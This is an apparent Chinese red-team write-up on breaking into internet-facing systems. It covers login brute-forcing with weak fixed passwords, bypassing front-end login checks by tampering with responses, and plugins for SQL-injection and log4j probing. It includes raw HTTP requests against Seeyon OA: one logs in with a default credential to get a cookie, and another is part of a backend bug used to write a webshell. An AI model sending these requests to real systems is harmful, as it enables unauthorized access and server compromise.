“红队外网打点：实战案例与优化策略分享”

红队外网打点实战案例分享

从最基础的登录框突破

登录框作为hw出现场次最多的角色，也是最容易出洞的，下面介绍一些自己常用的测试方法

登录爆破小技巧

像这种系统的爆破我们有两种解决方法：

• 分析前端加密算法，写脚本模拟对密码进行加密
• 固定密码为123456 000000 使用常见的用户名作为字典进行爆破

两种方法各有优劣，我更倾向于第二种，在比赛打点效率会更高，分析加密算法更适用于红队检测项目

修改返回数据包参数进入后台

有些时候网站登录状态是根据前端判断的，这时候我们就可以直接修改返回包进行绕过

插件探测常见sql注入和log4j漏洞

sql注入插件推荐 https://github.com/smxiazi/xia_sql

基本原理是通过发送多个数据包，根据返回数据长度判断是否存在注入

log4j插件推荐 https://github.com/TheKingOfDuck/burpFakeIP

通过burp插件fuzz数据包的header头

前台使用账号密码有时候不能登录，可发送下面数据包获取cookie

POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

UserAgentFrom=xx&login_username=audit-admin&login_password=seeyon123456

获取cookie之后就可以使用补丁较新的后台洞进行深入利用，这次使用copyfile这个后台洞

但实战后发现这个漏洞存在一些坑点，写入webshell时候报错了

POST /seeyon/ajax.do?method=ajaxAction&managerName=portalCssManager&rnd=111 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 70
Host: 192.168.91.17
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Accept-Encoding: gzip,deflate

arguments=%5B%22xxxxxx%22%5D&managerMethod=generateCssFileByCssStr